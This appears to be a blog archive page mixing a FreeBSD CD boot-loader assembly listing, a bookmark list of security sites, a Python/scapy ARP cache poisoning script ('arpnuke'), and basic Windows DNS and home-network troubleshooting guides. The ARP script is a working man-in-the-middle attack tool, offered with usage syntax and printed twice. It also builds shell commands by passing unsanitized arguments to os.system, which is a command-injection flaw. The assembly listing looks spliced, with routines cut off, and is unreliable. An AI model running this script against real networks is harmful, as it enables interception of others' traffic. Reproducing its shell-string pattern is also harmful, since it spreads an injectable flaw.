Wednesday, June 13, 2012
#
# Copyright (c) 2001 John Baldwin
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the author nor the names of any co-contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# $FreeBSD: release/9.0.0/sys/boot/i386/cdboot/cdboot.s 219126 2011-03-01 11:47:51Z brucec $
#
# a.out header fields
#
.set AOUT_TEXT,0x04 # text segment size
.set AOUT_DATA,0x08 # data segment size
.set AOUT_BSS,0x0c # zero'd BSS size
.set AOUT_SYMBOLS,0x10 # symbol table
.set AOUT_ENTRY,0x14 # entry point
.set AOUT_HEADER,MEM_PAGE_SIZE # size of the a.out header
#
# Constants for reading from the CD.
#
.set ERROR_TIMEOUT,0x80 # BIOS timeout on read
.set NUM_RETRIES,3 # Num times to retry
.set SECTOR_SIZE,0x800 # size of a sector
.set SECTOR_SHIFT,11 # number of place to shift
.set BUFFER_LEN,0x100 # number of sectors in buffer
.set MAX_READ,0x10000 # max we can read at a time
.set MAX_READ_SEC,MAX_READ >> SECTOR_SHIFT
.set MEM_READ_BUFFER,0x9000 # buffer to read from CD
.set MEM_VOLDESC,MEM_READ_BUFFER # volume descriptor
.set MEM_DIR,MEM_VOLDESC+SECTOR_SIZE # Lookup buffer
.set VOLDESC_LBA,0x10 # LBA of vol descriptor
.set VD_PRIMARY,1 # Primary VD
.set VD_END,255 # VD Terminator
.set VD_ROOTDIR,156 # Offset of Root Dir Record
.set DIR_LEN,0 # Offset of Dir Record length
.set DIR_EA_LEN,1 # Offset of EA length
.set DIR_EXTENT,2 # Offset of 64-bit LBA
.set DIR_SIZE,10 # Offset of 64-bit length
.set DIR_NAMELEN,32 # Offset of 8-bit name len
.set DIR_NAME,33 # Offset of dir name
#
# We expect to be loaded by the BIOS at 0x7c00 (standard boot loader entry
# point)
#
.code16
.globl start
.org 0x0, 0x0
#
# Program start.
#
start: cld # string ops inc
xor %ax,%ax # zero %ax
mov %ax,%ss # setup the
mov $start,%sp # stack
mov %ax,%ds # setup the
mov %ax,%es # data segments
mov %dl,drive # Save BIOS boot device
#
# Load Volume Descriptor
#
mov $VOLDESC_LBA,%eax # Set LBA of first VD
load_vd: push %eax # Save %eax
mov $1,%dh # One sector
mov $MEM_VOLDESC,%ebx # Destination
call read # Read it in
cmpb $VD_PRIMARY,(%bx) # Primary VD?
je have_vd # Yes
pop %eax # Prepare to
inc %eax # try next
cmpb $VD_END,(%bx) # Last VD?
jne load_vd # No, read next
have_vd: # Have Primary VD
#
# Try to look up the loader binary using the paths in the loader_paths
# array.
#
mov $loader_strings,%si # Point to start of array
lookup_path: push %si # Save file name pointer
call lookup # Try to find file
pop %di # Restore file name pointer
jnc lookup_found # Found this file
xor %al,%al # Look for next
mov $0xffff,%cx # path name by
repnz # scanning for
scasb # nul char
mov %di,%si # Point %si at next path
mov (%si),%al # Get first char of next path
or %al,%al # Is it double nul?
jnz lookup_path # No, try it.
lookup_found: # Found a loader file
#
# Load the binary into the buffer. Due to real mode addressing limitations
# we have to read it in 64k chunks.
#
mov DIR_SIZE(%bx),%eax # Read file length
add $SECTOR_SIZE-1,%eax # Convert length to sectors
shr $SECTOR_SHIFT,%eax
cmp $BUFFER_LEN,%eax
jbe load_sizeok
mov $msg_load2big,%si # Error message
call error
load_sizeok: movzbw %al,%cx # Num sectors to read
mov DIR_EXTENT(%bx),%eax # Load extent
xor %edx,%edx
mov DIR_EA_LEN(%bx),%dl
add %edx,%eax # Skip extended
mov $MEM_READ_BUFFER,%ebx # Read into the buffer
load_loop: mov %cl,%dh
cmp $MAX_READ_SEC,%cl # Truncate to max read size
jbe load_notrunc
mov $MAX_READ_SEC,%dh
load_notrunc: sub %dh,%cl # Update count
push %eax # Save
call read # Read it in
pop %eax # Restore
add $MAX_READ_SEC,%eax # Update LBA
add $MAX_READ,%ebx # Update dest addr
jcxz load_done # Done?
jmp load_loop # Keep going
load_done:
#
# Lookup the file in the path at [SI] from the root directory.
#
lookup: mov $VD_ROOTDIR+MEM_VOLDESC,%bx # Root directory record
mov DIR_EXTENT(%bx),rec_lba
mov DIR_SIZE(%bx),rec_size
mov $rec_size,%eax # Set LBA of root dir
push %eax # Save %eax
mov $1,%dh
mov $MEM_VOLDESC,%ebx # Destination
#
# Load DH sectors starting at LBA EAX into [EBX].
#
# Trashes: EAX
#
read: push %si # Save
push %cx # Save since some BIOSs trash
mov %eax,edd_lba # LBA to read from
mov %ebx,%eax # Convert address
shr $4,%eax # to segment
mov %ax,edd_addr+0x2 # and store
push %dx # Save
mov $edd_packet,%si # Address Packet
mov %dh,edd_len # Set length
mov drive,%dl # BIOS Device
mov $0x42,%ah # BIOS: Extended Read
int $0x13 # Call BIOS
pop %dx # Restore
pop %cx # Restore
pop %si
ret # Return
#
# EDD Packet
#
edd_packet: .byte 0x10 # Length
.byte 0 # Reserved
edd_len: .byte 0x0 # Num to read
.byte 0 # Reserved
edd_addr: .word 0x0,0x0 # Seg:Off
edd_lba: .quad 0x0 # LBA
drive: .byte 0
#
# State for searching dir
#
rec_lba: .long 0x0 # LBA (adjusted for EA)
rec_size: .long 0x0 # File size
loader_strings: .asciz "LOADER"
.asciz "loader"
.byte 0
Monday, July 12, 2010
Tech Links
Here is my bookmark list. All of these links have something to do with networking, security, linux, web development or technology in general. I apologize that it isn't very organized but the information contained within them is very useful for learning about network administration.
- Hak5 – Technolust since 2005
- IANA — Internet Assigned Numbers Authority
- Internet Engineering Task Force
- US-CERT: United States Computer Emergency Readiness Team
- SecurityFocus
- DEF CON® Hacking Conference - The Hacker Community's Foremost Social Network.
- Technology News, Analysis, Comments and Product Reviews for IT Professionals | ZDNet
- Default Password List
- Android Developers
- W3Schools Online Web Tutorials
- Color Scheme Designer 3
- Typetester – Compare fonts for the screen
- Tactile 3D Interface - Software to browse, explore, and organize your file-system in 3D.
- Oculis Labs, PrivateEye
- .:: Phrack Magazine ::.
- Security - Keylogging
- Testing and reviews of keyloggers, monitoring products and spy software (spyware) 2009
- Tricks of the Trade: Cracking passwords with Wikipedia, Wiktionary, Wikibooks etc
- What’s My Pass? » The Top 500 Worst Passwords of All Time
- List of Free Proxy Servers - Page 1 of 9
- bh-us-03-willis.pdf (application/pdf Object)
- Welcome to The TCP/IP Guide!
- Welcome to ScapyĆ¢€™s documentation! — Scapy v2.1.1-dev documentation
- Internet Protocol Suite - Wikipedia, the free encyclopedia
- SCAPY packet-crafting reference
- Usage — Scapy v2.1.1-dev documentation
- TCP Exploits by Prabhaker Mateti
- TCP, Transmission Control Protocol
- ARP spoofing - Wikipedia, the free encyclopedia
- HEXADECIMAL to BINARY conversion, HEX to Decimal converter, Hexdecimal convertor
- Cracking_Passwords_Guide.pdf (application/pdf Object)
- PF: The OpenBSD Packet Filter
- YouTube - SSL Strip
- Moxie Marlinspike >> Software
- PORTKNOCKING - A system for stealthy authentication across closed ports. : ABOUT : summary
- HOWTO: Internet sharing with Ubuntu (NAT Gateway) - Ubuntu Forums
- Paper: Kr3w's Cross-Site Scripting Tutorial | Articles | XSSed.com
- SANS: Top Cyber Security Risks - Executive Summary
- IT Security Magazine - Hakin9 www.hakin9.org
- Black Hat ® Technical Security Conference // Home
- 2.1. Address Resolution Protocol (ARP)
- Getting MAC address from a network interface
- List of TCP and UDP port numbers - Wikipedia, the free encyclopedia
- Wireshark · OUI Lookup Tool
- Ethernet Type Codes
- Multiple network interfaces and ARP flux - OpenVZ Wiki
- arp(7): ARP kernel module - Linux man page
- Section 27.6. Neighbor Deletion
- OReilly.Understanding.Linux.Network.Internals.Dec.2005
- http://www.etpenguin.com/pub/Reference/DOC_arp.txt
- http://tools.made-it.com/haring/desc.html
- IRC - Linux Kernel Newbies
- PLUG - Home
- arp_accept | LinuxInsight
- Arpwatch
- git.kernel.org - linux/kernel/git/stable/linux-2.6.34.y.git/blob - Documentation/networking/ip-sysctl.txt
- .::ArpON::.
- CAM Table Overflow - Hakipedia
- Defcon 15 - T364 LAN Protocol Attacks Part 1 - Arp Reloaded
- Free online network utilities - traceroute, nslookup, automatic whois lookup, ping, finger
- Free Webmaster Tools & Search Engine Optimization Tools
- Geotool
- Domain Tools: Whois Lookup and Domain Suggestions
- IHS | Home of Johnny Long and Hackers for Charity, Inc
- Snort :: Docs
- Offensive Computing | Community Malicious code research and analysis
- Wirelessdefence.org
- www.dd-wrt.com | Unleash Your Router
- Programming with pcap
- http://www.secdev.org/projects/scapy/files/scapydoc.pdf
- DigiNinja
- YouTube - Hacking wireless networks with Man in the Middle attacks
- IANA — Internet Assigned Numbers Authority
ARP Cache Poisoning
Here is a simple script I wrote in python. It performs an ARP poisoning attack by sending a forged ARP request packet.
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]"
For it to work it must be run as root and scapy must be installed.
The best way to mitigate this attack is with static ARP tables. See the man page for arp and the ifconfig -arp option for more info.
#!/usr/bin/python
import sys
from scapy.all import Ether,ARP,conf,sendp
import os
interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]
conf.iface = interface
print conf.iface
if (os.system('cat /proc/net/arp | grep ' + victim)):
os.system('arping -f -I ' + interface + ' ' + victim)
def local_mac(iface):
os.system('touch /tmp/.arpnuketmp')
os.system('ifconfig ' + iface + ' | grep HWaddr | cut -d" " -f11 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
def neigh_mac(ip):
os.system('touch /tmp/.arpnuketmp')
os.system('arp -na | grep ' + ip + ' | cut -d" " -f4 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
destmac = neigh_mac(victim)
srcmac = local_mac(interface)
ether = Ether(dst=destmac, src=srcmac, type=0x806)
arp = ARP(hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim, op=1)
sendp(ether/arp)
The syntax is "arpnuke [interface] [victim IP] [IP to masquerade as]"
For it to work it must be run as root and scapy must be installed.
The best way to mitigate this attack is with static ARP tables. See the man page for arp and the ifconfig -arp option for more info.
#!/usr/bin/python
import sys
from scapy.all import Ether,ARP,conf,sendp
import os
interface = sys.argv[1]
victim = sys.argv[2]
identity = sys.argv[3]
conf.iface = interface
print conf.iface
if (os.system('cat /proc/net/arp | grep ' + victim)):
os.system('arping -f -I ' + interface + ' ' + victim)
def local_mac(iface):
os.system('touch /tmp/.arpnuketmp')
os.system('ifconfig ' + iface + ' | grep HWaddr | cut -d" " -f11 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
def neigh_mac(ip):
os.system('touch /tmp/.arpnuketmp')
os.system('arp -na | grep ' + ip + ' | cut -d" " -f4 > /tmp/.arpnuketmp')
f = open('/tmp/.arpnuketmp', 'r')
return f.readline()[:-1]
f.close()
destmac = neigh_mac(victim)
srcmac = local_mac(interface)
ether = Ether(dst=destmac, src=srcmac, type=0x806)
arp = ARP(hwsrc=srcmac, psrc=identity, hwdst=destmac, pdst=victim, op=1)
sendp(ether/arp)
Monday, February 15, 2010
HOWTO configure client-side DNS (windows)
STEP 1
Right click on the networking icon in the bottom right and select "Open Network Connections" or go "Control-panel > Network and Internet Connections > Network Connections"
Right click on the networking icon in the bottom right and select "Open Network Connections" or go "Control-panel > Network and Internet Connections > Network Connections"
STEP 2
Right click on the desired network connection and click "properties"
STEP 3
Select "Internet Protocol (TCP/IP)" or "Internet Protocol version 4 (TCP/IP)" and click "properties"
STEP 4
Change "Obtain DNS server address automatically" to "use the following DNS server addresses" and then enter the IP address(es) of your DNS server(s). Preferred will be queried first and if it is down then secondary will be queried instead. Only preferred is required.
STEP 5
Reconnect to the network and use "nslookup 'some.domain.name'" Your new server should be displayed under Server and Address as in the picture below. If settings still havent changed try rebooting system.
Friday, February 5, 2010
Basic Home Network Troubleshooting Tutorial.
This is just a simple guide to help fix most network problems. It doesn't cover installing NIC drivers, configuring DNS, or the very basics such as how to connect to a network. This is just here to give you some steps to take before you decide to call up your ISP and ask for further assistance.
STEP 1
Restart your browser and try visiting other websites. Are you able to go to visit other sites or are you still receiving the same error?
If other sites work then the website you were trying to visit is down. Otherwise move on to step 2.
STEP 2
Is your computer connected to your router? There are two ways this can be done; wireless or with an ethernet cable. Ethernet cables are usually blue and the ends look like phone jacks. Make sure the cable or wireless adapter is plugged in all the way and isn't loose.
Here are some examples of wireless adapters:
STEP 3
Unplug both your modem and your router from their power source. The modem is the device that either plugs into the wall via a phone line or a coax cable (the same kind of cable that your TV plugs into the wall with). The only connection between the router and the wall is the power cable. Now would be a good time to make sure the router is connected to the modem, there should be a cable going from the modem into a slot on the back of the router labeled "WAN". Wait 1 minute and then plug the power back into the modem. Now wait 2 more minutes and then plug the power back into the router. Wait another minute and then reboot your computer.
STEP 4
Test connectivity between your computer and your router. To do this open the command prompt by clicking "Start > Run" and then enter "cmd" or "cmd.exe" and press enter. Type "ipconfig" in to the black window that pops up.
Now make note of the "Default Gateway", in this photo it would be "10.0.0.1" Now try to "ping" the router by entering the command "ping". So in my case I would type in "ping 10.0.0.1" and would get something like the following, replacing the "google.com" with your default gateway:
The second section indicated by the red box that says "Packets: Sent" shows you whether your ping requests are able to reach the router. If you are sending 4 and receiving 0 then there is a connection problem between your computer and your router.
Here are some other good links:
http://www.microsoft.com/windowsxp/using/networking/setup/wireless.mspx
http://support.microsoft.com/kb/928429
http://searchnetworking.techtarget.com/news/article/0,289142,sid7_gci945257,00.html
STEP 1
Restart your browser and try visiting other websites. Are you able to go to visit other sites or are you still receiving the same error?
If other sites work then the website you were trying to visit is down. Otherwise move on to step 2.
STEP 2
Is your computer connected to your router? There are two ways this can be done; wireless or with an ethernet cable. Ethernet cables are usually blue and the ends look like phone jacks. Make sure the cable or wireless adapter is plugged in all the way and isn't loose.
Here are some examples of wireless adapters:
STEP 3
Unplug both your modem and your router from their power source. The modem is the device that either plugs into the wall via a phone line or a coax cable (the same kind of cable that your TV plugs into the wall with). The only connection between the router and the wall is the power cable. Now would be a good time to make sure the router is connected to the modem, there should be a cable going from the modem into a slot on the back of the router labeled "WAN". Wait 1 minute and then plug the power back into the modem. Now wait 2 more minutes and then plug the power back into the router. Wait another minute and then reboot your computer.
STEP 4
Test connectivity between your computer and your router. To do this open the command prompt by clicking "Start > Run" and then enter "cmd" or "cmd.exe" and press enter. Type "ipconfig" in to the black window that pops up.
Now make note of the "Default Gateway", in this photo it would be "10.0.0.1" Now try to "ping" the router by entering the command "ping
The second section indicated by the red box that says "Packets: Sent" shows you whether your ping requests are able to reach the router. If you are sending 4 and receiving 0 then there is a connection problem between your computer and your router.
Here are some other good links:
http://www.microsoft.com/windowsxp/using/networking/setup/wireless.mspx
http://support.microsoft.com/kb/928429
http://searchnetworking.techtarget.com/news/article/0,289142,sid7_gci945257,00.html
Subscribe to:
Posts (Atom)